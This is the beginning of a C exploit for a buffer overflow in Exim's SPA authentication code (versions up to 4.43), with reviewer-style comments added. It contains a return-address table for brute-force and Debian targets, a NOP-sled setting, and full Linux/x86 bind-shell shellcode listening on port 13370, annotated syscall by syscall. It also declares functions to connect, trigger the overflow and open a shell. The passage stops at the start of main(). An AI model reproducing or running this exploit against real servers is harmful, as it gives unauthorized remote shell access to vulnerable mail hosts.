1 /* ecl-eximspa.c
2 * Yuri Gushin <yuri@eclipse.org.il>
3 *
4 * Howdy :)
5 * This is pretty straightforward, an exploit for the recently
6 * discovered vulnerability in Exim's (all versions prior to and
7 * including 4.43) SPA authentication code - spa_base64_to_bits()
8 * will overflow a fixed-size buffer because there are no adequate
9 * bounds checks before it in auth_spa_server()
10 *
11 * Greets fly out to the ECL crew, Alex Behar, Valentin Slavov
12 * blexim, manevski, elius, shrink, and everyone else who got left
13 * out :D
14 *
15 */
16
17 #include <stdlib.h>
18 #include <stdio.h>
19 #include <unistd.h>
20 #include <string.h>
21 #include <err.h>
22 #include <netinet/in.h>
23 #include <sys/socket.h>
24 #include <sys/types.h>
25 #include <netdb.h>
26 #include <arpa/inet.h>
27
/*
 * TCP port the payload listens on once it runs.  13370 == 0x343a, and the
 * very same two bytes ("\x34\x3a") are baked into the shellcode array sc[]
 * below, so the two definitions must be changed together or the shell()
 * connect will go to the wrong port.
 */
#define SC_PORT 13370

/*
 * Filler byte for the sled in front of the shellcode.  0xfd is a one-byte
 * instruction used here in place of the classic 0x90 NOP -- presumably to
 * dodge naive NOP-sled signatures; confirm it is still harmless for the
 * register state before swapping it out.
 */
#define NOP     0xfd
30
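/*
 * Return-address table, selected by the target index given on the command
 * line (the selection logic itself lives in parse_options(), not here).
 *
 * name    - human-readable label printed in the target list.
 * retaddr - value written over the saved return address.  Kept as int to
 *           match exploit()'s `int address` parameter; both constants
 *           exceed INT_MAX, so the conversion from the unsigned literal is
 *           implementation-defined (it wraps on two's-complement targets
 *           and is simply reinterpreted on the wire).
 *
 * Entry 0 is the brute-force seed, presumably stepped downwards by the
 * exploit loop with options.offset; entry 1 is a fixed address for one
 * specific Debian build and will not survive a recompile or ASLR.
 *
 * NOTE(review): the label strings previously carried U+2212 (Unicode minus)
 * in place of ASCII '-', an encoding artifact from the published listing;
 * they are restored to plain ASCII here so they print and compare as intended.
 */
struct {
    char *name;
    int retaddr;
} targets[] = {
    { "Bruteforce", 0xbfffffff },
    { "Debian Sarge exim4-daemon-heavy_4.34-9", 0xbfffed00 },
};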
38
/*
 * Payload placed after the sled.  Hand-decoded from the bytes (verify with a
 * disassembler before trusting the annotations): a Linux/x86 bind shell
 * driven through int 0x80 / socketcall.  Two things tie it to the rest of
 * the file: the port word "\x34\x3a" (0x343a == 13370 == SC_PORT) and the
 * literal "/bin//sh" near the end.  The 84 bytes are reproduced verbatim
 * from the original; only the grouping and comments differ.
 */
char sc[] = // thank you metasploit, skape, vlad902
    /* socket(PF_INET, SOCK_STREAM, 0); result parked in esi */
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80"
    "\x96"
    /* bind(s, {AF_INET, port 0x343a, 0.0.0.0}, 16) */
    "\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80"
    /* listen(s, ...) */
    "\xb0\x66\xd1\xe3\xcd\x80"
    /* accept(s, NULL, NULL) */
    "\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80"
    /* dup2(client, 2), dup2(client, 1), dup2(client, 0) */
    "\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
    /* execve("/bin//sh", ["/bin//sh"], NULL) */
    "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80";
46
/*
 * Run-time configuration shared across the file (presumably populated by
 * parse_options() and read by exploit()/shell()).
 *
 * host   - target address and port; sockaddr_in, so IPv4 only.
 * target - index into targets[]; must be range-checked by whoever sets it,
 *          nothing here enforces that.
 * offset - adjustment applied to the chosen return address; its sign and
 *          step are decided by the exploit loop, not by this struct.
 * wait   - small delay value (units chosen by its user; presumably seconds).
 */
struct {
    struct sockaddr_in host;
    int                target;
    int                offset;
    u_short            wait;
} options;
53
/*
 * Non-zero when the "Bruteforce" pseudo-target (index 0) is in effect --
 * presumably set by parse_options() and consulted by the exploit loop.
 * Static storage already zero-initialises it; the explicit 0 only makes
 * the default visible.
 */
static int brutemode = 0;

/* Network plumbing: connect to the server, drive the AUTH exchange, pop the shell. */
int  connect_port(u_short port);
void init_SPA(int sock);
void exploit(int sock, int address);
void shell(int sock);

/* Base64 encoder for the SPA blob handed to the server (out must be sized for 4/3 of inlen plus NUL by the caller). */
void spa_bits_to_base64(unsigned char *out, const unsigned char *in, int inlen);

/* Command-line handling and banner output. */
void parse_options(int argc, char **argv);
void usage(char *cmd);
void banner(void);
64
65 int main(int argc, char **argv)
66 {
67 int address, sock_s